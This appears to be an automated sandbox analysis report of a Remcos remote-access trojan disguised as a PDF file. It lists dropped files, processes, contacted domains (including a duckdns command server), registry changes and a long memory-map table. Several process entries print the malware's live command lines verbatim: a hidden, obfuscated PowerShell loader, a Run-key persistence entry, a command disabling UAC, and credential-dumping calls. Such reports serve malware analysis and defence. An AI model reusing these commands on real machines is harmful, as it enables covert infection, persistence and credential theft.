Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
IT01879020517_uGIim_xml#U00b7pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Loupen.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Loupen.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\BgImage.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\UserInfo.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\nsDialogs.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xb598f686, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_763cc06ddd191e0b2a3c26e6eec71deecc9f88_f469684b_67036ab9-a9a5-4c9a-8111-79a84e4dcabe\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_eeb76350ac29bb3b486937f9169f68096e924e2_f469684b_5f7c8348-3926-4c3f-a256-55d37fae53f0\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E5A.tmp.dmp
|
Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:38 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8129.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8169.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6BD.tmp.dmp
|
Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:56 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8C2.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8E2.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2ol2ewj.pcu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xy2loq3c.gjs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv7B7B.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0xa18356d8, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Farvebaandsomskifteren.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Montanes176.opt
|
Matlab v4 mat-file (little endian) \303, text, rows 1202847744, columns 285212672
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Wafery.unt
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\barsel.pul
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\migraines.sla
|
PGP symmetric key encrypted data - Plaintext or unencrypted data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tegnmssig.bra
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tradionsbevarende.unp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Neuraxial.Aca
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 25 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe
|
"C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Enmeshed=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und';$Bia=$Enmeshed.SubString(70893,3);.$Bia($Enmeshed)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ
/d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae%
($Prehaustorium)"
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle
minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Windows\SysWOW64\reg.exe
|
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\usqirflqwomfxiavdrsyibgadyvbmltib"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 4200
|
||
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 4276
|
There are 6 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://aka.ms/pscore6lBeq
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://geoplugin.net/json.gpr
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
http://upx.sf.net
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
a458386d9.duckdns.org
|
217.76.50.73
|
||
geoplugin.net
|
178.237.33.50
|
||
drive.google.com
|
142.250.185.206
|
||
drive.usercontent.google.com
|
172.217.18.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
217.76.50.73
|
a458386d9.duckdns.org
|
Sweden
|
||
142.250.185.206
|
drive.google.com
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
127.0.0.1
|
unknown
|
unknown
|
||
172.217.18.1
|
drive.usercontent.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
EnableLUA
|
||
HKEY_CURRENT_USER\Exhusband
|
Dairywomen
|
||
HKEY_CURRENT_USER\Environment
|
Nostocaceae
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
time
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Soumansite
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
ProgramId
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
FileId
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
LowerCaseLongPath
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
LongPathHash
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
Name
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
OriginalFileName
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
Publisher
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
Version
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
BinFileVersion
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
BinaryType
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
ProductName
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
ProductVersion
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
LinkDate
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
BinProductVersion
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
AppxPackageFullName
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
Size
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
Language
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
IsOsComponent
|
||
\REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe|bdbb2c1d41b249e7
|
Usn
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018800FB4CA6152
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
ApplicationFlags
|
There are 22 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7933000
|
unkown
|
page read and write
|
||
8A60000
|
unkown
|
page read and write
|
||
8B36000
|
unkown
|
page read and write
|
||
8B79000
|
unkown
|
page read and write
|
||
7C9D000
|
unkown
|
page read and write
|
||
8B65000
|
unkown
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
8A40000
|
unkown
|
page read and write
|
||
88FC000
|
unkown
|
page read and write
|
||
71B0000
|
heap
|
page execute and read and write
|
||
154D1861000
|
trusted library allocation
|
page read and write
|
||
AD0000
|
heap
|
page read and write
|
||
5101000
|
unkown
|
page read and write
|
||
154D17E0000
|
trusted library allocation
|
page read and write
|
||
60A9000
|
unkown
|
page read and write
|
||
3020000
|
unkown
|
page readonly
|
||
650000
|
heap
|
page read and write
|
||
154CCC02000
|
heap
|
page read and write
|
||
3428000
|
heap
|
page read and write
|
||
723C000
|
unkown
|
page read and write
|
||
7340000
|
unkown
|
page read and write
|
||
D0BA000
|
unkown
|
page execute and read and write
|
||
77C0000
|
unkown
|
page read and write
|
||
2770A7C000
|
stack
|
page read and write
|
||
2E50000
|
unkown
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
C6BA000
|
unkown
|
page execute and read and write
|
||
154CD7D0000
|
trusted library allocation
|
page read and write
|
||
154CC473000
|
heap
|
page read and write
|
||
80CC000
|
unkown
|
page execute and read and write
|
||
430000
|
unkown
|
page read and write
|
||
154D1860000
|
trusted library allocation
|
page read and write
|
||
154D2000000
|
heap
|
page read and write
|
||
154CC42B000
|
heap
|
page read and write
|
||
154D1AC7000
|
heap
|
page read and write
|
||
277007E000
|
unkown
|
page readonly
|
||
8A3C000
|
unkown
|
page read and write
|
||
3010000
|
unkown
|
page readonly
|
||
7C00000
|
unkown
|
page read and write
|
||
8E0E000
|
unkown
|
page read and write
|
||
154D1A1F000
|
heap
|
page read and write
|
||
B2BA000
|
unkown
|
page execute and read and write
|
||
154CC280000
|
heap
|
page read and write
|
||
71FD000
|
unkown
|
page read and write
|
||
7B70000
|
unkown
|
page read and write
|
||
276FFFE000
|
stack
|
page read and write
|
||
154D1AC0000
|
heap
|
page read and write
|
||
2E53000
|
unkown
|
page read and write
|
||
8720000
|
heap
|
page read and write
|
||
73D0000
|
unkown
|
page read and write
|
||
7DDF000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
33B4000
|
unkown
|
page read and write
|
||
836C000
|
unkown
|
page read and write
|
||
334E000
|
unkown
|
page read and write
|
||
4D57000
|
heap
|
page read and write
|
||
2E14000
|
unkown
|
page read and write
|
||
8AF4000
|
unkown
|
page read and write
|
||
154D1AB4000
|
heap
|
page read and write
|
||
4C0E000
|
unkown
|
page read and write
|
||
276FE7E000
|
unkown
|
page readonly
|
||
1FD000
|
stack
|
page read and write
|
||
4C80000
|
unkown
|
page execute and read and write
|
||
80F0000
|
unkown
|
page read and write
|
||
154D1840000
|
trusted library allocation
|
page read and write
|
||
8B93000
|
unkown
|
page read and write
|
||
7C20000
|
unkown
|
page read and write
|
||
154D1A2C000
|
heap
|
page read and write
|
||
27702FE000
|
stack
|
page read and write
|
||
7320000
|
unkown
|
page read and write
|
||
8900000
|
unkown
|
page read and write
|
||
34F0000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
154D1940000
|
trusted library allocation
|
page read and write
|
||
154D1880000
|
trusted library allocation
|
page read and write
|
||
23D0000
|
heap
|
page read and write
|
||
623A000
|
unkown
|
page read and write
|
||
468000
|
heap
|
page read and write
|
||
7CDE000
|
unkown
|
page read and write
|
||
78F8000
|
unkown
|
page read and write
|
||
2E4A000
|
unkown
|
page read and write
|
||
154CC513000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
33DA000
|
unkown
|
page execute and read and write
|
||
40A000
|
unkown
|
page write copy
|
||
50A1000
|
unkown
|
page read and write
|
||
277037E000
|
unkown
|
page readonly
|
||
2E1D000
|
unkown
|
page read and write
|
||
154D1A91000
|
heap
|
page read and write
|
||
277097E000
|
unkown
|
page readonly
|
||
154D1930000
|
trusted library allocation
|
page read and write
|
||
3178000
|
heap
|
page read and write
|
||
72C0000
|
unkown
|
page read and write
|
||
7BB0000
|
unkown
|
page read and write
|
||
85E1000
|
trusted library allocation
|
page execute and read and write
|
||
8770000
|
unkown
|
page read and write
|
||
277077E000
|
unkown
|
page readonly
|
||
276FC7E000
|
unkown
|
page readonly
|
||
73C0000
|
unkown
|
page read and write
|
||
154CCE91000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
59F000
|
stack
|
page read and write
|
||
7290000
|
unkown
|
page read and write
|
||
7EDF000
|
unkown
|
page read and write
|
||
154D1AE2000
|
heap
|
page read and write
|
||
154D1890000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
79F0000
|
unkown
|
page readonly
|
||
72D0000
|
unkown
|
page read and write
|
||
33B0000
|
unkown
|
page read and write
|
||
7C50000
|
unkown
|
page read and write
|
||
154CCD00000
|
heap
|
page read and write
|
||
6CB000
|
heap
|
page read and write
|
||
15D000
|
stack
|
page read and write
|
||
A7F000
|
stack
|
page read and write
|
||
34FB000
|
heap
|
page read and write
|
||
154CC502000
|
heap
|
page read and write
|
||
43E000
|
unkown
|
page read and write
|
||
154D1890000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
unkown
|
page read and write
|
||
711E000
|
unkown
|
page read and write
|
||
77C2000
|
unkown
|
page read and write
|
||
154CC400000
|
heap
|
page read and write
|
||
7F3B000
|
unkown
|
page execute and read and write
|
||
2990000
|
heap
|
page read and write
|
||
8CFE000
|
unkown
|
page read and write
|
||
28C9E000
|
unkown
|
page read and write
|
||
154CCD1A000
|
heap
|
page read and write
|
||
7A50000
|
unkown
|
page read and write
|
||
154D1A4E000
|
heap
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
32B0000
|
unkown
|
page read and write
|
||
78C7000
|
unkown
|
page read and write
|
||
286F000
|
stack
|
page read and write
|
||
154CCC15000
|
heap
|
page read and write
|
||
8070000
|
unkown
|
page execute and read and write
|
||
7390000
|
unkown
|
page read and write
|
||
71B5000
|
heap
|
page execute and read and write
|
||
7380000
|
unkown
|
page read and write
|
||
154CC490000
|
heap
|
page read and write
|
||
8650000
|
unkown
|
page read and write
|
||
154CD250000
|
trusted library section
|
page readonly
|
||
60A1000
|
unkown
|
page read and write
|
||
4D20000
|
unkown
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
277067A000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
440000
|
unkown
|
page readonly
|
||
154D1B02000
|
heap
|
page read and write
|
||
154CC4A0000
|
heap
|
page read and write
|
||
97F000
|
stack
|
page read and write
|
||
154D1A87000
|
heap
|
page read and write
|
||
7528000
|
unkown
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
438000
|
unkown
|
page read and write
|
||
154CD7A1000
|
trusted library allocation
|
page read and write
|
||
154D1AFA000
|
heap
|
page read and write
|
||
89FC000
|
unkown
|
page read and write
|
||
154D19C0000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
7BF0000
|
unkown
|
page read and write
|
||
8C70000
|
unkown
|
page read and write
|
||
6CE000
|
heap
|
page read and write
|
||
154CC478000
|
heap
|
page read and write
|
||
154D1860000
|
trusted library allocation
|
page read and write
|
||
276FB7B000
|
stack
|
page read and write
|
||
22CE000
|
stack
|
page read and write
|
||
6B9000
|
heap
|
page read and write
|
||
7700000
|
unkown
|
page read and write
|
||
3512000
|
heap
|
page read and write
|
||
8C50000
|
unkown
|
page read and write
|
||
2D8C000
|
stack
|
page read and write
|
||
36EF000
|
stack
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
8549000
|
unkown
|
page execute and read and write
|
||
60C9000
|
unkown
|
page read and write
|
||
7370000
|
unkown
|
page read and write
|
||
154D1AC2000
|
heap
|
page read and write
|
||
154D19B0000
|
trusted library allocation
|
page read and write
|
||
7BA0000
|
unkown
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
8BB0000
|
unkown
|
page read and write
|
||
3410000
|
unkown
|
page readonly
|
||
7A20000
|
unkown
|
page read and write
|
||
3126000
|
heap
|
page read and write
|
||
7A40000
|
unkown
|
page read and write
|
||
154CC3B0000
|
trusted library allocation
|
page read and write
|
||
154D1C00000
|
remote allocation
|
page read and write
|
||
72A0000
|
unkown
|
page read and write
|
||
345E000
|
unkown
|
page read and write
|
||
7B2E000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3400000
|
unkown
|
page read and write
|
||
688000
|
heap
|
page read and write
|
||
8750000
|
unkown
|
page read and write
|
||
57E000
|
stack
|
page read and write
|
||
77D2000
|
unkown
|
page read and write
|
||
2E1A000
|
unkown
|
page read and write
|
||
8740000
|
unkown
|
page read and write
|
||
2E38000
|
unkown
|
page read and write
|
||
154CD140000
|
trusted library allocation
|
page read and write
|
||
154CC4AE000
|
heap
|
page read and write
|
||
2770B7E000
|
unkown
|
page readonly
|
||
7FDD0000
|
unkown
|
page execute and read and write
|
||
680000
|
heap
|
page read and write
|
||
154D1850000
|
trusted library allocation
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
7B90000
|
unkown
|
page read and write
|
||
154CC413000
|
heap
|
page read and write
|
||
76FB000
|
unkown
|
page read and write
|
||
4CDC000
|
unkown
|
page read and write
|
||
72E0000
|
unkown
|
page read and write
|
||
73A0000
|
unkown
|
page read and write
|
||
2500000
|
heap
|
page read and write
|
||
E9F7000
|
unkown
|
page read and write
|
||
897C000
|
unkown
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
154CC4A2000
|
heap
|
page read and write
|
||
87F000
|
stack
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
72F0000
|
unkown
|
page read and write
|
||
27EF000
|
stack
|
page read and write
|
||
2E47000
|
unkown
|
page read and write
|
||
154CC529000
|
heap
|
page read and write
|
||
2ECD000
|
stack
|
page read and write
|
||
4D1D000
|
unkown
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
86CE000
|
unkown
|
page read and write
|
||
33B3000
|
unkown
|
page execute and read and write
|
||
715D000
|
unkown
|
page read and write
|
||
32AE000
|
unkown
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
87D0000
|
unkown
|
page read and write
|
||
154CD380000
|
trusted library allocation
|
page read and write
|
||
276F57E000
|
stack
|
page read and write
|
||
27700FE000
|
stack
|
page read and write
|
||
2E29000
|
unkown
|
page read and write
|
||
7926000
|
unkown
|
page read and write
|
||
816A000
|
unkown
|
page read and write
|
||
93E0000
|
unkown
|
page execute and read and write
|
||
88B5000
|
unkown
|
page read and write
|
||
4C68000
|
unkown
|
page read and write
|
||
2E41000
|
unkown
|
page read and write
|
||
85F6000
|
trusted library allocation
|
page execute and read and write
|
||
7A30000
|
unkown
|
page read and write
|
||
7310000
|
unkown
|
page read and write
|
||
8670000
|
unkown
|
page readonly
|
||
154D1990000
|
trusted library allocation
|
page read and write
|
||
78F0000
|
unkown
|
page read and write
|
||
44E000
|
stack
|
page read and write
|
||
7BD0000
|
unkown
|
page read and write
|
||
27704FE000
|
stack
|
page read and write
|
||
154CC47C000
|
heap
|
page read and write
|
||
335E000
|
unkown
|
page read and write
|
||
276FD7B000
|
stack
|
page read and write
|
||
7350000
|
unkown
|
page read and write
|
||
8CBE000
|
unkown
|
page read and write
|
||
276F97C000
|
stack
|
page read and write
|
||
276FA7E000
|
unkown
|
page readonly
|
||
5E0000
|
heap
|
page read and write
|
||
23CF000
|
stack
|
page read and write
|
||
70DE000
|
unkown
|
page read and write
|
||
6DE000
|
stack
|
page read and write
|
||
7E5E000
|
unkown
|
page read and write
|
||
85E0000
|
trusted library allocation
|
page read and write
|
||
33E5000
|
unkown
|
page execute and read and write
|
||
7C30000
|
unkown
|
page read and write
|
||
154D18A0000
|
trusted library allocation
|
page read and write
|
||
8C60000
|
unkown
|
page execute and read and write
|
||
154D18A4000
|
trusted library allocation
|
page read and write
|
||
154CC45B000
|
heap
|
page read and write
|
||
154D1930000
|
trusted library allocation
|
page read and write
|
||
154CD260000
|
trusted library section
|
page readonly
|
||
8BAA000
|
unkown
|
page read and write
|
||
79B7000
|
unkown
|
page read and write
|
||
154CC4B2000
|
heap
|
page read and write
|
||
7D9C000
|
unkown
|
page read and write
|
||
2DC8000
|
stack
|
page read and write
|
||
154D1C00000
|
remote allocation
|
page read and write
|
||
276F779000
|
stack
|
page read and write
|
||
594B000
|
unkown
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
154CD270000
|
trusted library section
|
page readonly
|
||
27703FE000
|
stack
|
page read and write
|
||
3170000
|
heap
|
page read and write
|
||
83A9000
|
unkown
|
page read and write
|
||
6C5000
|
heap
|
page read and write
|
||
7A10000
|
unkown
|
page read and write
|
||
154D19B0000
|
trusted library allocation
|
page read and write
|
||
33E0000
|
unkown
|
page read and write
|
||
7A60000
|
unkown
|
page read and write
|
||
154D1A00000
|
heap
|
page read and write
|
||
7330000
|
unkown
|
page read and write
|
||
349E000
|
stack
|
page read and write
|
||
6BF000
|
heap
|
page read and write
|
||
DABA000
|
unkown
|
page execute and read and write
|
||
277087B000
|
stack
|
page read and write
|
||
7C40000
|
unkown
|
page read and write
|
||
4C10000
|
heap
|
page execute and read and write
|
||
2E44000
|
unkown
|
page read and write
|
||
154D1B04000
|
heap
|
page read and write
|
||
282E000
|
stack
|
page read and write
|
||
7AEE000
|
unkown
|
page read and write
|
||
9EBA000
|
unkown
|
page execute and read and write
|
||
154CC4B8000
|
heap
|
page read and write
|
||
7F20000
|
unkown
|
page execute and read and write
|
||
33E2000
|
unkown
|
page read and write
|
||
8710000
|
unkown
|
page read and write
|
||
276F37E000
|
unkown
|
